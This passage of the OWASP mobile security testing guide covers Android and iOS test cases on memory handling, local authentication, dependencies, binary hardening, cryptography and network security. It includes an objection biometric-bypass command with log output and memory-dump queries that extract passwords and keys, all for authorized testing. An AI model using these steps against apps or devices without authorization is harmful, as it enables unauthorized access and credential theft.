This doesn't, however, guarantee that the content will be overwritten at runtime. To optimize the bytecode, the compiler will analyze and decide not to overwrite data because it will not be used afterwards (i.e., it is an unnecessary operation). Even if the code is in the compiled DEX, the optimization may occur during the just-in-time or ahead-of-time compilation in the VM.
There is no silver bullet for this problem because different solutions have different consequences. For example, you may perform additional calculations (e.g., XOR the data into a dummy buffer), but you'll have no way to know the extent of the compiler's optimization analysis. On the other hand, using the overwritten data outside the compiler's scope (e.g., serializing it in a temp file) guarantees that it will be overwritten but obviously impacts performance and maintenance.
Then, using Arrays.fill
to overwrite the data is a bad idea because the method is an obvious hooking target (see the chapter \"Tampering and Reverse Engineering on Android\" for more details).
The final issue with the above example is that the content was overwritten with zeroes only. You should try to overwrite critical objects with random data or content from non-critical objects. This will make it really difficult to construct scanners that can identify sensitive data on the basis of its management.
Below is an improved version of the previous example:
Example in Java:
byte[] nonSecret = somePublicString.getBytes(\"ISO-8859-1\");\nbyte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (int i = 0; i < secret.length; i++) {\n secret[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(secret);\n out.flush();\n out.close();\n }\n}\n
Example in Kotlin:
val nonSecret: ByteArray = somePublicString.getBytes(\"ISO-8859-1\")\nval secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (i in secret.indices) {\n secret[i] = nonSecret[i % nonSecret.size]\n }\n\n val out = FileOutputStream(\"/dev/null\")\n out.write(secret)\n out.flush()\n out.close()\n }\n}\n
For more information, take a look at Securely Storing Sensitive Data in RAM.
In the \"Static Analysis\" section, we mentioned the proper way to handle cryptographic keys when you are using AndroidKeyStore
or SecretKey
.
For a better implementation of SecretKey
, look at the SecureSecretKey
class below. Although the implementation is probably missing some boilerplate code that would make the class compatible with SecretKey
, it addresses the main security concerns:
Example in Java:
public class SecureSecretKey implements javax.crypto.SecretKey, Destroyable {\n private byte[] key;\n private final String algorithm;\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n public SecureSecretKey(final byte[] key, final String algorithm) {\n this.key = key.clone();\n this.algorithm = algorithm;\n }\n\n public String getAlgorithm() {\n return this.algorithm;\n }\n\n public String getFormat() {\n return \"RAW\";\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n public byte[] getEncoded() {\n if(null == key){\n throw new NullPointerException();\n }\n\n return key.clone();\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory.*/\n public void destroy() {\n if (isDestroyed()) {\n return;\n }\n\n byte[] nonSecret = new String(\"RuntimeException\").getBytes(\"ISO-8859-1\");\n for (int i = 0; i < key.length; i++) {\n key[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(key);\n out.flush();\n out.close();\n\n this.key = null;\n System.gc();\n }\n\n public boolean isDestroyed() {\n return key == null;\n }\n }\n
Example in Kotlin:
class SecureSecretKey(key: ByteArray, algorithm: String) : SecretKey, Destroyable {\n private var key: ByteArray?\n private val algorithm: String\n override fun getAlgorithm(): String {\n return algorithm\n }\n\n override fun getFormat(): String {\n return \"RAW\"\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n override fun getEncoded(): ByteArray {\n if (null == key) {\n throw NullPointerException()\n }\n return key!!.clone()\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory. */\n override fun destroy() {\n if (isDestroyed) {\n return\n }\n val nonSecret: ByteArray = String(\"RuntimeException\").toByteArray(charset(\"ISO-8859-1\"))\n for (i in key!!.indices) {\n key!![i] = nonSecret[i % nonSecret.size]\n }\n val out = FileOutputStream(\"/dev/null\")\n out.write(key)\n out.flush()\n out.close()\n key = null\n System.gc()\n }\n\n override fun isDestroyed(): Boolean {\n return key == null\n }\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n init {\n this.key = key.clone()\n this.algorithm = algorithm\n }\n}\n
Secure user-provided data is the final secure information type usually found in memory. This is often managed by implementing a custom input method, for which you should follow the recommendations given here. However, Android allows information to be partially erased from EditText
buffers via a custom Editable.Factory
.
EditText editText = ...; // point your variable to your EditText instance\nEditText.setEditableFactory(new Editable.Factory() {\n public Editable newEditable(CharSequence source) {\n ... // return a new instance of a secure implementation of Editable.\n }\n});\n
Refer to the SecureSecretKey
example above for an example Editable
implementation. Note that you will be able to securely handle all copies made by editText.getText
if you provide your factory. You can also try to overwrite the internal EditText
buffer by calling editText.setText
, but there is no guarantee that the buffer will not have been copied already. If you choose to rely on the default input method and EditText
, you will have no control over the keyboard or other components that are used. Therefore, you should use this approach for semi-confidential information only.
In all cases, make sure that sensitive data in memory is cleared when a user signs out of the application. Finally, make sure that highly sensitive information is cleared out the moment an Activity or Fragment's onPause
event is triggered.
Note that this might mean that a user has to re-authenticate every time the application resumes.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis will help you identify potential problems, but it can't provide statistics about how long data has been exposed in memory, nor can it help you identify problems in closed-source dependencies. This is where dynamic analysis comes into play.
There are various ways to analyze the memory of a process, e.g. live analysis via a debugger/dynamic instrumentation and analyzing one or more memory dumps.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a rooted or a non-rooted device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on Android\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -zz memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"Instead of dumping the memory to your host computer, you can alternatively use r2frida. With it, you can analyze and inspect the app's memory while it's running. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash (\\:)
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\".
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#explicitly-dumping-and-analyzing-the-java-heap","title":"Explicitly Dumping and Analyzing the Java Heap","text":"For rudimentary analysis, you can use Android Studio's built-in tools. They are on the Android Monitor tab. To dump memory, select the device and app you want to analyze and click Dump Java Heap. This will create a .hprof file in the captures directory, which is on the app's project path.
To navigate through class instances that were saved in the memory dump, select the Package Tree View in the tab showing the .hprof file.
For more advanced analysis of the memory dump, use the Eclipse Memory Analyzer Tool (MAT). It is available as an Eclipse plugin and as a standalone application.
To analyze the dump in MAT, use the hprof-conv platform tool, which comes with the Android SDK.
./hprof-conv memory.hprof memory-mat.hprof\n
MAT provides several tools for analyzing the memory dump. For example, the Histogram provides an estimate of the number of objects that have been captured from a given type, and the Thread Overview shows processes' threads and stack frames. The Dominator Tree provides information about keep-alive dependencies between objects. You can use regular expressions to filter the results these tools provide.
Object Query Language studio is a MAT feature that allows you to query objects from the memory dump with an SQL-like language. The tool allows you to transform simple objects by invoking Java methods on them, and it provides an API for building sophisticated tools on top of the MAT.
SELECT * FROM java.lang.String\n
In the example above, all String
objects present in the memory dump will be selected. The results will include the object's class, memory address, value, and retain count. To filter this information and see only the value of each string, use the following code:
SELECT toString(object) FROM java.lang.String object\n
Or
SELECT object.toString() FROM java.lang.String object\n
SQL supports primitive data types as well, so you can do something like the following to access the content of all char
arrays:
SELECT toString(arr) FROM char[] arr\n
Don't be surprised if you get results that are similar to the previous results; after all, String
and other Java data types are just wrappers around primitive data types. Now let's filter the results. The following sample code will select all byte arrays that contain the ASN.1 OID of an RSA key. This doesn't imply that a given byte array actually contains an RSA key (the same byte sequence may be part of something else), but this is probable.
SELECT * FROM byte[] b WHERE toString(b).matches(\".*1\\.2\\.840\\.113549\\.1\\.1\\.1.*\")\n
Finally, you don't have to select whole objects. Consider an SQL analogy: classes are tables, objects are rows, and fields are columns. If you want to find all objects that have a \"password\" field, you can do something like the following:
SELECT password FROM \".*\" WHERE (null != password)\n
During your analysis, search for:
Repeating tests and memory dumps will help you obtain statistics about the length of data exposure. Furthermore, observing the way a particular memory segment (e.g., a byte array) changes may lead you to some otherwise unrecognizable sensitive data (more on this in the \"Remediation\" section below).
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/","title":"Testing the Device-Access-Security Policy","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#overview","title":"Overview","text":"Apps that process or query sensitive information should run in a trusted and secure environment. To create this environment, the app can check the device for the following:
To test the device-access-security policy that the app enforces, a written copy of the policy must be provided. The policy should define available checks and their enforcement. For example, one check could require that the app run only on Android 6.0 (API level 23) or a more recent version, closing the app or displaying a warning if the Android version is less than 6.0.
Check the source code for functions that implement the policy and determine whether it can be bypassed.
You can implement checks on the Android device by querying Settings.Secure for system preferences. Device Administration API offers techniques for creating applications that can enforce password policies and device encryption.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis depends on the checks enforced by the app and their expected behavior. If the checks can be bypassed, they must be validated.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/","title":"Testing Local Authentication","text":""},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#overview","title":"Overview","text":"The usage of frameworks in an app can be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using otool:
otool -L <AppName>.app/<AppName>\n
If LocalAuthentication.framework
is used in an app, the output will contain both of the following lines (remember that LocalAuthentication.framework
uses Security.framework
under the hood):
/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication\n/System/Library/Frameworks/Security.framework/Security\n
If Security.framework
is used, only the second one will be shown.
It is important to remember that the LocalAuthentication framework is an event-based procedure and as such, should not be the sole method of authentication. Though this type of authentication is effective on the user-interface level, it is easily bypassed through patching or instrumentation. Therefore, it is best to use the keychain service method, which means you should:
kSecAccessControlBiometryCurrentSet
(before iOS 11.3 kSecAccessControlTouchIDCurrentSet
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the keychain item. Whenever the user adds a fingerprint or facial representation to the device, it will automatically invalidate the entry in the Keychain. This makes sure that the keychain item can only ever be unlocked by users that were enrolled when the item was added to the keychain.kSecAccessControlBiometryAny
(before iOS 11.3 kSecAccessControlTouchIDAny
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the Keychain entry. The Keychain entry will survive any (re-)enrolling of new fingerprints or facial representation. This can be very convenient if the user has a changing fingerprint. However, it also means that attackers, who are somehow able to enroll their fingerprints or facial representations to the device, can now access those entries as well.kSecAccessControlUserPresence
can be used as an alternative. This will allow the user to authenticate through a passcode if the biometric authentication no longer works. This is considered to be weaker than kSecAccessControlBiometryAny
since it is much easier to steal someone's passcode entry by means of shoulder surfing than it is to bypass the Touch ID or Face ID service.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
or the kSecAttrAccessibleWhenPasscodeSet
protection class is set when the SecAccessControlCreateWithFlags
method is called. Note that the ...ThisDeviceOnly
variant will make sure that the keychain item is not synchronized with other iOS devices.Note, a data protection class specifies the access methodology used to secure the data. Each class uses different policies to determine when the data is accessible.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#dynamic-analysis","title":"Dynamic Analysis","text":"Objection Biometrics Bypass can be used to bypass LocalAuthentication. Objection uses Frida to instrument the evaluatePolicy
function so that it returns True
even if authentication was not successfully performed. Use the ios ui biometrics_bypass
command to bypass the insecure biometric authentication. Objection will register a job, which will replace the evaluatePolicy
result. It will work in both Swift and Objective-C implementations.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass\n(agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable\n...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # (agent) [3mhtws9x47q] Localized Reason for auth requirement: Please authenticate yourself\n(agent) [3mhtws9x47q] OS authentication response: false\n(agent) [3mhtws9x47q] Marking OS response as True instead\n(agent) [3mhtws9x47q] Biometrics bypass hook complete\n
If vulnerable, the module will automatically bypass the login form.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/","title":"Testing Object Persistence","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#static-analysis","title":"Static Analysis","text":"All different flavors of object persistence share the following concerns:
There are several ways to perform dynamic analysis:
First see whether there is an update mechanism at all: if it is not yet present, it might mean that users cannot be forced to update. If the mechanism is present, see whether it enforces \"always latest\" and whether that is indeed in line with the business strategy. Otherwise check if the mechanism supports updating to a given version. Make sure that every entry point of the application goes through the updating mechanism in order to make sure that the update mechanism cannot be bypassed.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0080/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Finally, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#detecting-vulnerabilities-of-third-party-libraries","title":"Detecting vulnerabilities of third party libraries","text":"In order to ensure that the libraries used by the apps are not carrying vulnerabilities, one can best check the dependencies installed by CocoaPods or Carthage.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#swift-package-manager","title":"Swift Package Manager","text":"In case Swift Package Manager is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities:
First, at the root of the project, where the Package.swift file is located, type
swift build\n
Next, check the file Package.resolved for the actual versions used and inspect the given libraries for known vulnerabilities.
You can utilize the OWASP Dependency-Check's experimental Swift Package Manager Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's Package.swift file and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Package.swift\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#cocoapods","title":"CocoaPods","text":"In case CocoaPods is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Podfile is located, execute the following commands:
sudo gem install cocoapods\npod install\n
Next, now that the dependency tree has been built, you can create an overview of the dependencies and their versions by running the following commands:
sudo gem install cocoapods-dependencies\npod dependencies\n
The result of the steps above can now be used as input for searching different vulnerability feeds for known vulnerabilities.
Note:
You can utilize the OWASP Dependency-Check's experimental CocoaPods Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's *.podspec and/or Podfile.lock files and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Podfile.lock\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#carthage","title":"Carthage","text":"In case Carthage is used for third party dependencies, then the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Cartfile is located, type
brew install carthage\ncarthage update --platform iOS\n
Next, check the Cartfile.resolved for actual versions used and inspect the given libraries for known vulnerabilities.
Note, at the time of writing this chapter, there is no automated support for Carthage based dependency analysis known to the authors. At least, this feature was already requested for the OWASP DependencyCheck tool but not yet implemented (see the GitHub issue).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#discovered-library-vulnerabilities","title":"Discovered library vulnerabilities","text":"When a library is found to contain vulnerabilities, then the following reasoning applies:
In case frameworks are added manually as linked libraries:
In the case of copy-pasted sources: search the header files (in case of using Objective-C) and otherwise the Swift files for known method names for known libraries.
Next, note that for hybrid applications, you will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, you will have to check the C# dependencies.
Last, if the application is a high-risk application, you will end up vetting the library manually. In that case there are specific requirements for native code, which are similar to the requirements established by the MASVS for the application as a whole. Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises two parts: the actual license verification and checking which libraries are involved in case of missing sources.
It needs to be validated whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
When performing app analysis, it is important to also analyze the app dependencies (usually in form of libraries or so-called iOS Frameworks) and ensure that they don't contain any vulnerabilities. Even when you don't have the source code, you can still identify some of the app dependencies using tools like objection, MobSF or the otool -L
command. Objection is the recommended tool, since it provides the most accurate results and it is easy to use. It contains a module to work with iOS Bundles, which offers two commands: list_bundles
and list_frameworks
.
The list_bundles
command lists all of the application\u2019s bundles that are not related to Frameworks. The output contains executable name, bundle id, version of the library and path to the library.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_bundles\nExecutable Bundle Version Path\n------------ ----------------------------------------- --------- -------------------------------------------\nDVIA-v2 com.highaltitudehacks.DVIAswiftv2.develop 2 ...-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCoreGlyphs com.apple.CoreGlyphs 1 ...m/Library/CoreServices/CoreGlyphs.bundle\n
The list_frameworks
command lists all of the application\u2019s bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/","title":"Memory Corruption Bugs","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#static-analysis","title":"Static Analysis","text":"Are there native code parts? If so: check for the given issues in the general memory corruption section. Native code is a little harder to spot when compiled. If you have the sources then you can see that C files use .c source files and .h header files and C++ uses .cpp files and .h files. This is a little different from the .swift and the .m source files for Swift and Objective-C. These files can be part of the sources, or part of third party libraries, registered as frameworks and imported through various tools, such as Carthage, the Swift Package Manager or Cocoapods.
For any managed code (Objective-C / Swift) in the project, check the following items:
free
is called twice for a given region instead of once.UnsafePointer
can be managed wrongly, which will allow for various memory corruption issues.Unmanaged
manually, leading to wrong counter numbers and a too late/too soon release.A great talk is given on this subject at Realm academy and a nice tutorial to see what is actually happening is provided by Ray Wenderlich on this subject.
Please note that with Swift 5 you can only deallocate full blocks, which means the playground has changed a bit.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#dynamic-analysis","title":"Dynamic Analysis","text":"There are various tools provided which help to identify memory bugs within Xcode, such as the Debug Memory graph introduced in Xcode 8 and the Allocations and Leaks instrument in Xcode.
Next, you can check whether memory is freed too fast or too slow by enabling NSAutoreleaseFreedObjectCheckEnabled
, NSZombieEnabled
, NSDebugEnabled
in Xcode while testing the application.
There are various well written explanations which can help with taking care of memory management. These can be found in the reference list of this chapter.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/","title":"Make Sure That Free Security Features Are Activated","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#static-analysis","title":"Static Analysis","text":"You can use radare2 to check the binary security features.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
And run the following commands:
[0x1000180c8]> i~pic,canary\ncanary true\npic true\n
[0x1000180c8]> is~release,retain\n124 0x002951e0 0x1000891e0 LOCAL FUNC 0 imp.dispatch_release\n149 0x00294e80 0x100088e80 LOCAL FUNC 0 imp.objc_autorelease\n150 0x00294e8c 0x100088e8c LOCAL FUNC 0 imp.objc_autoreleasePoolPop\n151 0x00294e98 0x100088e98 LOCAL FUNC 0 imp.objc_autoreleasePoolPush\n152 0x00294ea4 0x100088ea4 LOCAL FUNC 0 imp.objc_autoreleaseReturnValue\n165 0x00294f40 0x100088f40 LOCAL FUNC 0 imp.objc_release\n167 0x00294f58 0x100088f58 LOCAL FUNC 0 imp.objc_retainAutorelease\n168 0x00294f64 0x100088f64 LOCAL FUNC 0 imp.objc_retainAutoreleaseReturnValue\n169 0x00294f70 0x100088f70 LOCAL FUNC 0 imp.objc_retainAutoreleasedReturnValue\n
All the features are enabled in these examples:
PIE (Position Independent Executable): indicated by the flag pic true
.
MH_EXECUTE
), not to dynamic libraries (MH_DYLIB
).Stack Canary: indicated by the flag canary true
.
ARC (Automatic Reference Counting): indicated by symbols such as objc_autorelease
or objc_retainAutorelease
.
These checks can be performed dynamically using objection. Here's one example:
com.yourcompany.PPClient on (iPhone: 13.2.3) [usb] # ios info binary\nName Type Encrypted PIE ARC Canary Stack Exec RootSafe\n-------------------- ------- ----------- ----- ----- -------- ------------ ----------\nPayPal execute True True True True False False\nCardinalMobile dylib False False True True False False\nFraudForce dylib False False True True False False\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/","title":"Verifying the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#static-analysis","title":"Static Analysis","text":"For each of the libraries that are used by the application, the used algorithms and cryptographic configurations need to be verified to make sure they are not deprecated and used correctly.
Pay attention to how-to-be-removed key-holding datastructures and plain-text data structures are defined. If the keyword let
is used, then you create an immutable structure which is harder to wipe from memory. Make sure that it is part of a parent structure which can be easily removed from memory (e.g. a struct
that lives temporally).
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#commoncryptor","title":"CommonCryptor","text":"If the app uses standard cryptographic implementations provided by Apple, the easiest way to determine the status of the related algorithm is to check for calls to functions from CommonCryptor
, such as CCCrypt
and CCCryptorCreate
. The source code contains the signatures of all functions of CommonCryptor.h. For instance, CCCryptorCreate
has following signature:
CCCryptorStatus CCCryptorCreate(\n CCOperation op, /* kCCEncrypt, etc. */\n CCAlgorithm alg, /* kCCAlgorithmDES, etc. */\n CCOptions options, /* kCCOptionPKCS7Padding, etc. */\n const void *key, /* raw key material */\n size_t keyLength,\n const void *iv, /* optional initialization vector */\n CCCryptorRef *cryptorRef); /* RETURNED */\n
You can then compare all the enum
types to determine which algorithm, padding, and key material is used. Pay attention to the keying material: the key should be generated securely - either using a key derivation function or a random-number generation function. Note that functions which are noted in chapter \"Cryptography for Mobile Apps\" as deprecated, are still programmatically supported. They should not be used.
Given the continuous evolution of all third party libraries, this should not be the place to evaluate each library in terms of static analysis. Still there are some points of attention:
There are various keywords to look for: check the libraries mentioned in the overview and static analysis of the section \"Verifying the Configuration of Cryptographic Standard Algorithms\" for which keywords you can best check on how keys are stored.
Always make sure that:
Check also the list of common cryptographic configuration issues.
Most of the recommendations for static analysis can already be found in chapter \"Testing Data Storage for iOS\". Next, you can read up on it at the following pages:
Hook cryptographic methods and analyze the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#static-analysis","title":"Static Analysis","text":"In Swift, the SecRandomCopyBytes
API is defined as follows:
func SecRandomCopyBytes(_ rnd: SecRandomRef?,\n _ count: Int,\n _ bytes: UnsafeMutablePointer<UInt8>) -> Int32\n
The Objective-C version is
int SecRandomCopyBytes(SecRandomRef rnd, size_t count, uint8_t *bytes);\n
The following is an example of the APIs usage:
int result = SecRandomCopyBytes(kSecRandomDefault, 16, randomBytes);\n
Note: if other mechanisms are used for random numbers in the code, verify that these are either wrappers around the APIs mentioned above or review them for their secure-randomness. Often this is too hard, which means you can best stick with the implementation above.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#dynamic-analysis","title":"Dynamic Analysis","text":"If you want to test for randomness, you can try to capture a large set of numbers and check with Burp's sequencer plugin to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#overview","title":"Overview","text":"All the presented cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Info.plist, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which ATS is ignored) or a badly configured cross-platform framework.
IMPORTANT: You should apply these tests to the app main code but also to any app extensions, frameworks or Watch apps embedded within the app as well.
For more information refer to the article \"Preventing Insecure Network Connections\" and \"Fine-tune your App Transport Security settings\" in the Apple Developer Documentation.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using URLSession
(which uses the standard URL Loading System from iOS) or Network
(for socket-level communication using TLS and access to TCP and UDP).
Identify the network APIs used by the app and see if it uses any low-level networking APIs.
Apple Recommendation: Prefer High-Level Frameworks in Your App: \"ATS doesn\u2019t apply to calls your app makes to lower-level networking interfaces like the Network framework or CFNetwork. In these cases, you take responsibility for ensuring the security of the connection. You can construct a secure connection this way, but mistakes are both easy to make and costly. It\u2019s typically safest to rely on the URL Loading System instead\" (see source).
If the app uses any low-level APIs such as Network
or CFNetwork
, you should carefully investigate if they are being used securely. For apps using cross-platform frameworks (e.g. Flutter, Xamarin, ...) and third party frameworks (e.g. Alamofire) you should analyze if they're being configured and used securely according to their best practices.
Make sure that the app:
These checks are only indicative; we cannot name specific APIs since every app might use a different framework. Please use this information as a reference when inspecting the code.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-for-cleartext-traffic","title":"Testing for Cleartext Traffic","text":"Ensure that the app is not allowing cleartext HTTP traffic. Since iOS 9.0 cleartext HTTP traffic is blocked by default (due to App Transport Security (ATS)) but there are multiple ways in which an application can still send it:
NSAllowsArbitraryLoads
attribute to true
(or YES
) on NSAppTransportSecurity
in the app's Info.plist
.Info.plist
Check that NSAllowsArbitraryLoads
is not set to true
globally or for any domain.
If the application opens third party web sites in WebViews, then from iOS 10 onwards NSAllowsArbitraryLoadsInWebContent
can be used to disable ATS restrictions for the content loaded in web views.
